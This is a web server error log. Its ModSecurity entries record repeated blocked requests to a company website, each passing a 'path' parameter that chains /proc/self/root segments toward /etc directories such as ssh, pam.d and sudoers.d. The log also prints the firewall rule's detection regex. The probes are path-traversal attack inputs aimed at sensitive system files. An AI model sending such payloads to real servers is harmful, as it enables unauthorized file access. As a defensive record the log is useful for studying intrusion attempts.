[Fri Mar 20 06:31:04.351560 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:50326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T2Na6ubjKNq_cu4bA6AAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:05.750993 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:50334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T2RCii7xarUs8iHZWTAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:07.053619 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:50342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T211pVZ5mVmJwsFMeQAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:08.297211 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.243.128:50350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T3PHIg5MgXLBnicPnowAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:09.670140 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.243.128:44656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T3fHIg5MgXLBnicPnpgAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:11.167224 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:44660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T3rninkcc-iUj5ApMsQAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:12.590094 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:44662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T4DJ3M9BSuKP7CAYFnQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:13.865378 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:44666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T4RCii7xarUs8iHZWUgAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:15.166994 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.243.128:44674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T47ninkcc-iUj5ApMtgAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:15.623130 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:44686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T4-oXxyEfFpUF8f9wPgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:17.319292 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:44690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T5RCii7xarUs8iHZWWQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:19.593622 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:44694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T5vXLqtnMIWvjpaKIhAAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:21.211991 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:51112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T6da6ubjKNq_cu4bA9AAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:22.822452 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:51120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T6hCii7xarUs8iHZWXQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:24.420241 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:51134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T7PqxLDW4GITHUkTTTQAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:25.481156 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.241.31:53342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T7QF0L0L-SsrnPo5WGAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:26.099043 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:51136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T7rninkcc-iUj5ApMvgAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:27.560353 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:51140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T7xCii7xarUs8iHZWXwAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:29.199057 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:51154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T8da6ubjKNq_cu4bA9wAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:30.836316 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:52066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T8vqxLDW4GITHUkTTVQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:32.462956 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.243.128:52078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T9F1pVZ5mVmJwsFMeUAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
